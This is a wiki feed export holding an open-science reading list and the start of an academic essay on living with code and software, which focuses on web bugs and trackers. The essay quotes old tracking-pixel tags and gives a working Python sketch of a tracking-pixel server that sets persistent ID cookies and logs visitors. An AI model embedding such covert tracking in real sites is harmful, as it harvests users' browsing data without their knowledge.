The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from computer science and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being increasingly used to produce new ways of approaching and understanding texts in the humanities - what is sometimes thought of as 'the digital humanities'. [http://www.livingbooksaboutlife.org/books/Open_science/Introduction (more...)] &lt;br /&gt;
&lt;br /&gt;
== Open Science  ==&lt;br /&gt;
&lt;br /&gt;
=== It’s An Open (Science), Open (Access), Open (Source), Open (Notebook) World  ===&lt;br /&gt;
&lt;br /&gt;
;[http://usefulchem.wikispaces.com/ Open Notebook Science ]&lt;br /&gt;
&lt;br /&gt;
;Patrick O. Brown, Michael B. Eisen, Harold Varmus&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0000036 Why PLoS Became a Publisher]&lt;br /&gt;
&lt;br /&gt;
;Sally Murray, Stephen Choi, John Hoey, Claire Kendall, James Maskalyk, and Anita Palepu&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez Open Science, Open Access and Open Source Software at ''Open Medicine'']&lt;br /&gt;
&lt;br /&gt;
=== Community Science  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=12873908}} &lt;br /&gt;
&lt;br /&gt;
;[http://www.psfk.com/2010/09/biocurious-a-community-lab-for-biotechnology.html BioCurious: A Community Lab for Biotechnology]&lt;br /&gt;
&lt;br /&gt;
;Richard Stallman&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0020047 Free Community Science and the Free Development of Science]&lt;br /&gt;
&lt;br /&gt;
=== 'This Revolution Will Be Digitized’: Online Tools for Open Science  ===&lt;br /&gt;
&lt;br /&gt;
;[http://biogang.openwetware.org/ Biogang]&lt;br /&gt;
&lt;br /&gt;
;Bill Hooker&amp;amp;nbsp; &lt;br /&gt;
:[http://3quarksdaily.blogs.com/3quarksdaily/2007/01/the_future_of_s.html The Future of Science is Open, Part 3: An Open Science World]&lt;br /&gt;
&lt;br /&gt;
;Chris Patil and Vivian Siegel&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2675795/ This Revolution Will Be Digitized: Online Tools for Radical Collaboration]&lt;br /&gt;
&lt;br /&gt;
=== Open Science Publishing  ===&lt;br /&gt;
&lt;br /&gt;
;Philip E. Bourne&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2877727/?tool=pmcentrez#pcbi.1000787-Hey1 What Do I Want from the Publisher of the Future?]&lt;br /&gt;
&lt;br /&gt;
;Cameron Neylon&amp;amp;nbsp; &lt;br /&gt;
:[http://pirsa.org/08090038/ Science in the Open/or/How I Learned to Stop Worrying and Love My Blog]&lt;br /&gt;
&lt;br /&gt;
== Open Knowledge  ==&lt;br /&gt;
&lt;br /&gt;
=== Access to Knowledge  ===&lt;br /&gt;
&lt;br /&gt;
;[http://okfn.org/ Open Knowledge Foundation]&lt;br /&gt;
&lt;br /&gt;
;Gaelle Krikorian and Amy Kapczynski, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://www.soros.org/initiatives/information/focus/access/articles_publications/publications/age-of-intellectual-property-20101110/age-of-intellectual-property-20101110.pdf ''Access to Knowledge In the Age of Intellectual Property'']&lt;br /&gt;
&lt;br /&gt;
=== New Models for Open Sharing and Open Research  ===&lt;br /&gt;
&lt;br /&gt;
;Anne H. Margulies&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0020200 A New Model for Open Sharing]&lt;br /&gt;
&lt;br /&gt;
;Thomas B. Kepler, Marc A. Marti-Renom, Stephen M. Maurer, Arti K. Rai, Ginger Taylor, Matthew H. Todd&amp;amp;nbsp; &lt;br /&gt;
:[http://www.publish.csiro.au/nid/51/paper/CH06095.htm Open Source Research - The Power of Us]&lt;br /&gt;
&lt;br /&gt;
=== Open Knowledge and its Discontents  ===&lt;br /&gt;
&lt;br /&gt;
;J.J. King&amp;amp;nbsp; &lt;br /&gt;
:[http://www.metamute.org/proudtobeflesh The Packet Gang: Openness and its Discontents]&lt;br /&gt;
&lt;br /&gt;
;Michael Gurstein&amp;amp;nbsp; &lt;br /&gt;
:[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide]&lt;br /&gt;
&lt;br /&gt;
== Open Data  ==&lt;br /&gt;
&lt;br /&gt;
=== Data-Intensive Science  ===&lt;br /&gt;
&lt;br /&gt;
;Vincent S. Smith&amp;amp;nbsp; &lt;br /&gt;
:[http://www.biomedcentral.com/1756-0500/2/113 Data Publication: Towards a Database of Everything]&lt;br /&gt;
&lt;br /&gt;
;Tony Hey, Stewart Tansley, Kristen Tolle, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://research.microsoft.com/en-us/collaboration/fourthparadigm/4th_paradigm_book_part4_complete.pdf Scholarly Communication, ''The Fourth Paradigm: Data-Intensive Scientific Discovery'']&lt;br /&gt;
&lt;br /&gt;
=== World of Data  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.freeourdata.org.uk/ Free Our Data]&lt;br /&gt;
&lt;br /&gt;
;Simon Rogers&amp;amp;nbsp; &lt;br /&gt;
:[http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data How Canada Became an Open Data and Data Journalism Powerhouse]&lt;br /&gt;
&lt;br /&gt;
=== We Can Know It For You  ===&lt;br /&gt;
&lt;br /&gt;
;Omer Tene&amp;amp;nbsp; &lt;br /&gt;
:[http://epubs.utah.edu/index.php/ulr/article/viewArticle/136 What Google Knows: Privacy and Internet Search Engines]&lt;br /&gt;
&lt;br /&gt;
;Daniel Chandramohan, Kenji Shibuya, Philip Setel, Sandy Cairncross, Alan D. Lopez, Christopher J. L. Murray, Basia Żaba, Robert W. Snow, Fred Binka&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0050057 Should Data from Demographic Surveillance Systems Be Made More Widely Available to Researchers?]&lt;br /&gt;
&lt;br /&gt;
== '''Digitize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== Encode Me/Decode Me  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.ornl.gov/sci/techresources/Human_Genome/home.shtml Human Genome Project]&lt;br /&gt;
&lt;br /&gt;
;The ENCODE Project Consortium&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/picrender.cgi?accid=PMC3079585&amp;amp;blobtype=pdf&amp;amp;tool=pmcentrez A User's Guide to the Encyclopaedia of DNA Elements (ENCODE) ]&lt;br /&gt;
&lt;br /&gt;
;[http://www.decodeme.com/about-decodeme deCODEme]&lt;br /&gt;
&lt;br /&gt;
=== Life-Tracking  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=27381297}} &lt;br /&gt;
&lt;br /&gt;
;[http://quantifiedself.com Quantified Self]&lt;br /&gt;
&lt;br /&gt;
;Gary Wolf&amp;amp;nbsp; &lt;br /&gt;
:[http://xrl.us/bh3d4g The Data-Driven Life]&lt;br /&gt;
&lt;br /&gt;
;Aiden R. Doherty and Alan F. Smeaton&amp;amp;nbsp; &lt;br /&gt;
:[http://doras.dcu.ie/15300/1/Sensors-03-154-Doherty-ie-edited.pdf Automatically Augmenting Lifelog Events Using Pervasively Generated Content from Millions of People]&lt;br /&gt;
&lt;br /&gt;
;Jennifer S. Beaudin, Stephen S. Intille, and Margaret E. Morris&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC1794006/?tool=pmcentrez#ref1 To Track or Not to Track: User Reactions to Concepts in Longitudinal Health Monitoring]&lt;br /&gt;
&lt;br /&gt;
=== The Neurological Turn: or, ‘How the Internet Gets Inside Us'  ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;NhLnoZFCDBM&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Adam Gopnik&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newyorker.com/arts/critics/atlarge/2011/02/14/110214crat_atlarge_gopnik The Information: How the Internet Gets Inside Us]&lt;br /&gt;
&lt;br /&gt;
;N. Katherine Hayles&amp;amp;nbsp; &lt;br /&gt;
:[http://www.sciy.org/2010/11/24/hyper-and-deep-attention-the-generational-divide-in-cognitive-modes-by-n-katherine-hayles/ Hyper and Deep Attention: The Generational Divide in Cognitive Modes]&lt;br /&gt;
&lt;br /&gt;
;Anna Munster&amp;amp;nbsp; &lt;br /&gt;
:[http://computationalculture.net/article/nerves-of-data Nerves of Data: The Neurological Turn In/Against Networked Media]&lt;br /&gt;
&lt;br /&gt;
== '''Visualize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== What is Visualization?  ===&lt;br /&gt;
&lt;br /&gt;
;Lev Manovich&amp;amp;nbsp; &lt;br /&gt;
:[http://manovich.net/blog/wp-content/uploads/2010/10/manovich_visualization_2010.doc What is Visualization?]&lt;br /&gt;
&lt;br /&gt;
;Nathan Yau&amp;amp;nbsp; &lt;br /&gt;
:[http://flowingdata.com/2011/02/23/data-visualization-meets-game-design-to-explore-your-digital-life/ Data Visualization Meets Game Design to Explore your Digital Life]&lt;br /&gt;
&lt;br /&gt;
;[http://bloom.io/ Bloom]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8569187}} &lt;br /&gt;
&lt;br /&gt;
;Keiichi Matsuda &lt;br /&gt;
:[http://www.keiichimatsuda.com/augmented.php Augmented (hyper)Reality: Domestic Robocop]&lt;br /&gt;
&lt;br /&gt;
=== Mood-mapping  ===&lt;br /&gt;
&lt;br /&gt;
;Celeste Biever&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newscientist.com/article/dn19200-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter Mood Maps Reveal Emotional States of America]&lt;br /&gt;
&lt;br /&gt;
;[http://www.newscientist.com/articlevideo/dn19200/221111468001-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter mood video]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ZglPWYb8X2o&amp;lt;/youtube&amp;gt; [http://www.moodscope.com/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.moodscope.com/ Moodscope]&lt;br /&gt;
&lt;br /&gt;
;[http://www.mappiness.org.uk Mappiness]&lt;br /&gt;
&lt;br /&gt;
=== The Visualized Human (or, The Human As Spectacle)  ===&lt;br /&gt;
&lt;br /&gt;
;Nicholas Felton&amp;amp;nbsp; &lt;br /&gt;
:[http://feltron.com/ The Annual Felton Report]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;RE4ce4mexrU&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Deb Roy&amp;amp;nbsp; &lt;br /&gt;
:[http://www.youtube.com/watch?v=RE4ce4mexrU&amp;amp;feature=youtu.be The Birth of a Word]&lt;br /&gt;
&lt;br /&gt;
;Johanna Drucker&amp;amp;nbsp; &lt;br /&gt;
:[http://mit.tv/y7OwFq Humanistic Approaches to the Graphical Expression of Interpretation]&lt;br /&gt;
&lt;br /&gt;
== Search Me  ==&lt;br /&gt;
&lt;br /&gt;
=== Search-Engine Science  ===&lt;br /&gt;
&lt;br /&gt;
;Emily H. Chan, Vikram Sahai, Corrie Conrad, and John S. Brownstein&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC3104029&amp;amp;tool=pmcentrez Using Web Search Query Data to Monitor Dengue Epidemics: A New Model for Neglected Tropical Disease Surveillance]&lt;br /&gt;
&lt;br /&gt;
;Annie Y.S. Lau, Enrico Coiera, Tatjana Zrimec, and Paul Compton&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC2956236&amp;amp;tool=pmcentrez Clinician Search Behaviors May Be Influenced by Search Engine Design]&lt;br /&gt;
&lt;br /&gt;
:[https://brandyourself.com/ BrandYourself]&lt;br /&gt;
&lt;br /&gt;
=== The Science of Control  ===&lt;br /&gt;
&lt;br /&gt;
;Alessio Signorini, Alberto Maria Segre, Philip M. Polgreen&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosone.org/article/info%3Adoi%2F10.1371%2Fjournal.pone.0019467 The Use of Twitter to Track Levels of Disease Activity and Public Concern in the U.S. During the Influenza A H1N1 Pandemic]&lt;br /&gt;
&lt;br /&gt;
;David Parry&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/Surveillance ''Surveillance'' ]&lt;br /&gt;
&lt;br /&gt;
;Felix Stalder and Christine Mayer&amp;amp;nbsp; &lt;br /&gt;
:[http://felix.openflows.com/node/113 The Second Index: Search Engines, Personalization and Surveillance (Deep Search)]&lt;br /&gt;
&lt;br /&gt;
=== Deep Search  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=13456992}} &lt;br /&gt;
&lt;br /&gt;
;Michael K. Bergman&amp;amp;nbsp; &lt;br /&gt;
:[http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 The Deep Web: Surfacing Hidden Value]&lt;br /&gt;
&lt;br /&gt;
;Clare Birchall&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/The_in/visible The Invisible Web, ''The In/Visible'']&lt;br /&gt;
&lt;br /&gt;
== Media Gifts?  ==&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8223187}} [http://www.suicidemachine.org/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.suicidemachine.org/ Web 2.0 Suicide Machine]&lt;br /&gt;
&lt;br /&gt;
;[http://transparencygrenade.com/ Transparency Grenade]&lt;br /&gt;
&lt;br /&gt;
;[http://www.freedomboxfoundation.org/ Freedom Box Foundation]&lt;br /&gt;
&lt;br /&gt;
;[http://yacy.net/en/index.html/ YaCy]&lt;br /&gt;
&lt;br /&gt;
;[http://navasse.net/traceblog/about.html Traceblog]&lt;br /&gt;
&lt;br /&gt;
;[http://turbulence.org/Works/JJPS/extension The JJPS Firefox Extension]&lt;br /&gt;
&lt;br /&gt;
;[http://www.weavrs.com/find/ Weavrs]&lt;br /&gt;
&lt;br /&gt;
;[http://bengrosser.com/projects/facebook-demetricator/ Facebook Demetricator]&lt;br /&gt;
&lt;br /&gt;
== Appendix  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ukNkx45Ua0Y&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Karl Popper, The Open Society and its Enemies&lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Attributions Attributions]  ==&lt;br /&gt;
&lt;br /&gt;
== A 'Frozen' PDF Version of this Living Book  ==&lt;br /&gt;
&lt;br /&gt;
;[http://livingbooksaboutlife.org/pdfs/bookarchive/DigitizeMe.pdf Download a 'frozen' PDF version of this book as it appeared on 7th October 2011]&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4997</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4997"/>
		<updated>2012-06-21T11:25:30Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology, made up of disparate software ecologies, that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. That is, we live in a world where computational concepts and ideas are foundational, or ontological. Here, code and software become the paradigmatic forms of knowing and doing - to the extent that other candidates for this role, such as air, the economy, evolution, the environment, satellites, and so forth, are understood and explained through computational concepts and categories.&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has been highly successful in penetrating more and more into the lifeworld. Digital code/software has created, and continues to create, specific tensions in relation to old media forms, such as the disruption it has produced in the print, music and film industries, as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary, kernel within the softwarization project. It is a potential that is understood as relating to the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate, often theorised as a form of network politics. Indeed, as Deuze ''et al.'' have argued:&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. For example, 427 million Europeans (or 65 percent) use the Internet, and more than 9 in 10 European Internet users read news online (Wauters, 2012). These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers them.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These computational devices, particularly mobile forms, also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life continues to expand, driven by the network effects of digital media. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane (see, for example, Hall, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences. Code/software are the materialisation of computationality, in that they are the medium through which structural features of computation&amp;amp;nbsp;are realised and mediated. For example, code/software disconnects the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system (see also Parikka, 2012). Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and which I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacrum lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. 
That is, the material form of code/software is difficult to theorise and understand due to its perceived invisibility or ethereality, while having concrete effects nonetheless. This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangles which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking of physical keyboards and trackpads as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep - although it is useful to note that some theorists, such as Frabetti (2010), have problematised Hayles' understanding of code, print, and materiality.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, and therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, and send information about the user back to their servers.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Originally introduced as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data about users has important privacy implications, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user - code which, should it be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999):&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
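&lt;br /&gt;
To make this mechanism concrete, here is a minimal sketch - in Python, for illustration only, and emphatically not the code of any company discussed here - of what such a tracking pixel does on the server side: it serves an invisible 1x1 GIF, assigns a persistent identifier cookie, and logs the visit. The endpoint, cookie name and logging are all assumptions, and the check of the (voluntary) 'do not track' header anticipates the discussion of regulation below.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Hypothetical sketch of a tracking pixel ('web bug') endpoint; illustrative only.&lt;br /&gt;
import uuid&lt;br /&gt;
from http.server import BaseHTTPRequestHandler, HTTPServer&lt;br /&gt;
&lt;br /&gt;
# A minimal transparent 1x1 GIF: the invisible surface of the bug.&lt;br /&gt;
PIXEL_GIF = bytes.fromhex(&lt;br /&gt;
    '474946383961010001008000'&lt;br /&gt;
    '00000000ffffff21f9040100'&lt;br /&gt;
    '0000002c0000000001000100'&lt;br /&gt;
    '0002024401003b'&lt;br /&gt;
)&lt;br /&gt;
&lt;br /&gt;
class PixelHandler(BaseHTTPRequestHandler):&lt;br /&gt;
    def do_GET(self):&lt;br /&gt;
        cookie = self.headers.get('Cookie', '')&lt;br /&gt;
        if 'uid=' in cookie:&lt;br /&gt;
            uid = cookie.split('uid=')[1].split(';')[0]&lt;br /&gt;
        else:&lt;br /&gt;
            uid = uuid.uuid4().hex  # first visit: mint a persistent ID&lt;br /&gt;
        # The 'do not track' header is advisory; honouring it is voluntary.&lt;br /&gt;
        if self.headers.get('DNT') != '1':&lt;br /&gt;
            # The 'state' that flows back to the tracker on every page view.&lt;br /&gt;
            print(uid, self.headers.get('Referer'), self.headers.get('User-Agent'))&lt;br /&gt;
        self.send_response(200)&lt;br /&gt;
        self.send_header('Content-Type', 'image/gif')&lt;br /&gt;
        self.send_header('Set-Cookie', 'uid=%s; Max-Age=31536000' % uid)&lt;br /&gt;
        self.end_headers()&lt;br /&gt;
        self.wfile.write(PIXEL_GIF)  # the invisible 1x1 image itself&lt;br /&gt;
&lt;br /&gt;
if __name__ == '__main__':&lt;br /&gt;
    HTTPServer(('', 8000), PixelHandler).serve_forever()&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A page embeds this as an image with width and height of 1, exactly as in the EFF examples above: the user sees nothing, while the request itself carries the cookie, the referring page and the user-agent back to the tracker.&lt;br /&gt;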
&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)'; the data is not shared with third parties, though no information is given on data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, 